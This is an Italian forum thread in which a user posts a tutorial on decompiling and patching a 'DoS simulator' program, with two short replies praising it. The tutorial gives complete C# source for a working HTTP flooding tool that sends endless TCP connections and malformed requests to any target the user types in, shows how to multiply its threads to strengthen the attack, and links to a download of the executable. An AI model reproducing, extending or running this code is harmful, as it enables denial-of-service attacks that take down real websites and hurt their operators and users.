Potenziare manualmente un programma che simula attacchi di tipo DoS
×
Accedi al tuo account

Hai perso la password?
Registrati adesso è GRATUITO

Appena entrato avrai:
Norton Safe Web Connessione HTTPS Sicura

Registrati Adesso!

Menu
NAV
Pubblicità

BETA
Tag: Potenziare, manualmente, programma, simula, attacchi, tipo,
Valutazione discussione:
  • 1 voto(i) - 4 media
  • 1
  • 2
  • 3
  • 4
  • 5

Tutorial Potenziare manualmente un programma che simula attacchi di tipo DoS

1683 Visite
Utente Normale
*
5.00C
06/2014
17
24
Utente Normale
Messaggio: #1
Tutorial Potenziare manualmente un programma che simula attacchi di tipo DoS
08/02/2015, 12:54

Aggiorna il tuo account per nascondere gli annunci pubblicitari.

Salve Stertix,
oggi vi mostrerò come potenziare manualmente un programma che simula attacchi di tipo DoS.
Prima di iniziare vorrei farvi notare che: NON MI ASSUMO NESSUNA RESPONSABILITÁ DI CIÒ CHE CAUSERETE CON QUESTA GUIDA. LA GUIDA È CREATA SOLO A SCOPO INFORMATIVO
Oggi vi posterò un programma, chiamato 'powerDoS', il quale è scarsissimo (fatto apposta), che ovviamente utilizzeremo per potenziarlo.
Il cosiddetto Reverse Engineering, ingegneria inversa...
Prima di tutto scarichiamo gli occorrenti, .NET Reflector, in grado di decompilare programmi che utilizzano librerie .NET.
Clicca qui per scaricare .NET Reflector
Compilate i campi necessari con una e-mail a caso e un nome a caso:
[Immagine: kcgx3c.png]
Aprite il setup, ReflectorInstaller.exe e cliccate Next se ve lo chiede, affinchè installerete .NET Reflector.

Adesso abbiamo a disposizione .NET Reflector, ma dobbiamo scaricare un suo plug-in: ReflexIL, un assembly editor
Clicca qui per scaricare ReflexIL
(Non c'è bisogno della scansione, è una celebre DLL, resa scaricabile appunto dal sito originale).
Una volta scaricato, estraete sul desktop il file DLL:
[Immagine: 2q9l001.png]
Andiamo ad aprire Reflector ed aggiungiamo un plug-in seguendo i miei passi:
[Immagine: 4r87f5.png]
[Immagine: o7tumf.jpg]
Una volta aggiunto cliccate su Close (nella finestra Add-Ins).

Adesso andiamo a scaricare poweredDoS.exe, come già detto: simula gli attacchi DoS, ma è pessimo, saremo noi a migliorarlo.
Download: https://www.mediafire.com/?ef0bpp40owdtkdm
Scansione: https://www.virustotal.com/it/file/8d4ef...423393185/

Estraete poweredDoS.exe nel desktop e trascinatelo su .NET Reflector.
Cliccate tutto quello che è evidenziato in rosso, seguendo i passaggi con i numeri:
[Immagine: i77rbt.png]

Adesso è comparsa una piccola finestra, quindi:
[Immagine: 34figza.png] (scusate se ho messo 3 nell'ultimo passaggio... doveva essere 2)

Una volta cliccato 'Replace all with code', dobbiamo creare un codice in C#... ma io già ne ho creato uno, perciò dovete solo copiare tutto questo:
Codice:
//hewoSource
#region " Imports "
using System;
using System.Collections.Generic;
using System.IO;
using System.Net.Sockets;
using System.Threading;

#endregion

#region " Referenced assemblies "
// - mscorlib v4.0.0.0
// - Microsoft.VisualBasic v10.0.0.0
// - System v4.0.0.0
// - poweredDoS v1.0.0.0
#endregion

namespace poweredDoS.poweredDoS
{
    class mdlPoweredDoS
    {
        // Limited support!
        // You can only reference methods or fields defined in the class (not in ancestors classes)
        // Fields and methods stubs are needed for compilation purposes only.
        // Reflexil will automaticaly map current type, fields or methods to original references.
        static void poweredDoSAttack()
        {
            int num2 = (mdlPoweredDoS.Thread - 1);
            int i = 0;
            while (i <= num2)
            {
                Thread Thread1 = new Thread(mdlPoweredDoS.Protocollo);
                Thread1.Start();
                mdlPoweredDoS.threadz.Add(Thread1);
                i += 1;
                }
            }    
        
        #region " Methods stubs "
        // Do not add or update any method. If compilation fails because of a method declaration, comment it
        static mdlPoweredDoS()
        {
        }
        
        mdlPoweredDoS()
        {
        }
        
static void Main()
    {
    Console.Title = "poweredDoS | Your own simulator of DoS attacks | Idea by Hewo";
    Console.ForegroundColor = ConsoleColor.Magenta;
    Console.WriteLine("poweredDoS //This file must be reversed");
    Console.WriteLine();
    Console.ForegroundColor = ConsoleColor.Yellow;
    Console.WriteLine("Target:");
    mdlPoweredDoS.target = Console.ReadLine();
    Console.WriteLine("Port:");
    mdlPoweredDoS.porta = Convert.ToInt32(Console.ReadLine());
    Console.WriteLine("Protocol:");
    if (Console.ReadLine().ToLower().Contains("slowloris"))
    {
        Console.WriteLine("Packets:");
        mdlPoweredDoS.Thread = Convert.ToInt32(Console.ReadLine());
        mdlPoweredDoS.poweredDoSAttack();
        Console.ReadLine();
    }
    else
    {
        Environment.Exit(0);
    }
    }
    
        
public static void Protocollo()
        {
            while (true)
            {
                try
                {
                    TcpClient client = new TcpClient();
                    client.Connect(mdlPoweredDoS.target, mdlPoweredDoS.porta);
                    StreamWriter writer = new StreamWriter(client.GetStream());
                    writer.Write(("GET / HTTP/1.1" + "\r" + "\n" + "Host: " + mdlPoweredDoS.target + "\r" + "\n" + "User-Agent: Mozilla/4.0" + "\r" + "\n" + "Connection: Keep(-Alive)" + "\r" + "\n" + "Accept-Encoding: identity, *;q=0" + "\r" + "\n" + "Accept(-Language) : en()" + "\r" + "\n" + "Range:  bytes = 0 - 10"));
                    writer.Write(("POST / HTTP/1.1" + "\r" + "\n" + "Host: " + mdlPoweredDoS.target + "\r" + "\n" + "User-Agent: Mozilla/4.0" + "\r" + "\n" + "Connection: Keep(-Alive)" + "\r" + "\n" + "Accept-Encoding: identity, *;q=0" + "\r" + "\n" + "Accept(-Language) : en()" + "\r" + "\n" + "Range:  bytes = 0 - 10"));
                    writer.Flush();
                    mdlPoweredDoS.pacchetti = (mdlPoweredDoS.pacchetti + 4);
                    Console.ForegroundColor = ConsoleColor.Green;
                    Console.WriteLine(("Sent packets: //" + Convert.ToString(mdlPoweredDoS.pacchetti)));
                }
                catch
                {
                    Console.ForegroundColor = ConsoleColor.Red;
                    Console.WriteLine("Website down.");
                }
            }
        }
        
        
        #endregion
        
        #region " Fields stubs "
        // Do not add or update any field. If compilation fails because of a field declaration, comment it
        static string target;
        static System.Collections.Generic.List<System.Threading.Thread> threadz;
        static int pacchetti;
        static int porta;
        static int Thread;
        #endregion
    
    }
}

, dopo aver copiato il codice, cancellate tutto quello che c'è scritto in quella finestra, e incollate quello che avete copiato:
[Immagine: 10ok3o3.png]
Per potenziarlo dobbiamo scrivere così:
Codice:
Thread Thread1 = new Thread(mdlPoweredDoS.Protocollo);
                Thread1.Start();
                mdlPoweredDoS.threadz.Add(Thread1);
                Thread Thread2 = new Thread(mdlPoweredDoS.Protocollo);
                Thread2.Start();
                mdlPoweredDoS.threadz.Add(Thread2);
                Thread Thread3 = new Thread(mdlPoweredDoS.Protocollo);
                Thread3.Start();
                mdlPoweredDoS.threadz.Add(Thread3);
                Thread Thread4 = new Thread(mdlPoweredDoS.Protocollo);
                Thread4.Start();
                mdlPoweredDoS.threadz.Add(Thread4);
                Thread Thread5 = new Thread(mdlPoweredDoS.Protocollo);
                Thread5.Start();
                mdlPoweredDoS.threadz.Add(Thread5);
                i += 1;
Prima il programma avviava solo 1 thread, adesso il programma avvierà 5 thread sincronizzati, l'attacco sarà "migliore".
Per chi non mi ha capito: aggiungendo più volte quel testo con il numero successivo, il programma che simula attacchi DoS sarà potenziato.
Adesso possiamo compilarlo e cliccare Ok:
[Immagine: 73gfpe.png]
Adesso è potenziato! Non ci rimane altro che salvare l'assembly:
[Immagine: 33fghw6.png]
Una volta salvato, possiamo vedere se è veramente potenziato, appunto decompilando poweredDoS.exe vecchio e quella nuovo:
[Immagine: 11ihmyv.png]
Adesso avete capito?
Credo di fare presto anche un video su come farlo...
Alla prossima

Rispondi


(Questo messaggio è stato modificato l'ultima volta il: 08/02/2015, 13:02 da Hewo ReNext.)
La Seguente 2 users say Grazie A Hewo ReNext Per Questo Post:
Natnox (02-08-2015), xenos230 (02-09-2015)
Utente Normale
*
1.00C
05/2013
17
37
Utente Normale
Messaggio: #2
Tutorial Potenziare manualmente un programma che simula attacchi di tipo DoS
08/02/2015, 14:29


Buona guida, anche se alla fine è un po' come riscriverlo, a questo punto tanto vale crearne uno da 0 :cc
Bravo comunque Hewo Cuore Complimenti!


Firma:

[Immagine: 14jx2z7.jpg]

Rispondi


Utente Normale
*
5.00C
06/2014
17
24
Utente Normale
Messaggio: #3
Tutorial Potenziare manualmente un programma che simula attacchi di tipo DoS
08/02/2015, 14:37


(08/02/2015, 14:29)Lex007 Ha scritto: Buona guida, anche se alla fine è un po' come riscriverlo, a questo punto tanto vale crearne uno da 0 :cc
Bravo comunque Hewo Cuore Complimenti!

Non proprio riscriverlo da 0...
Grazie lex

Rispondi


Aggiorna il tuo account per nascondere gli annunci pubblicitari.




Utenti che stanno guardando questa discussione: 1 Ospite(i)



Discussioni simili
Discussione Autore Risposte Letto Ultimo messaggio
  Informazione [PROGRAMMA] Cheat Engine Natnox 0 361 24/04/2017, 13:08
Ultimo messaggio: Natnox
  Tutorial Utilizzo di API per proibire l'utilizzo del programma da persone NON italiane Hewo ReNext 0 579 27/01/2015, 19:41
Ultimo messaggio: Hewo ReNext
  Release Console Application che simula attacchi di tipo DoS Livio Owna 5 1,730 19/07/2014, 20:45
Ultimo messaggio: #MarshMallouJ~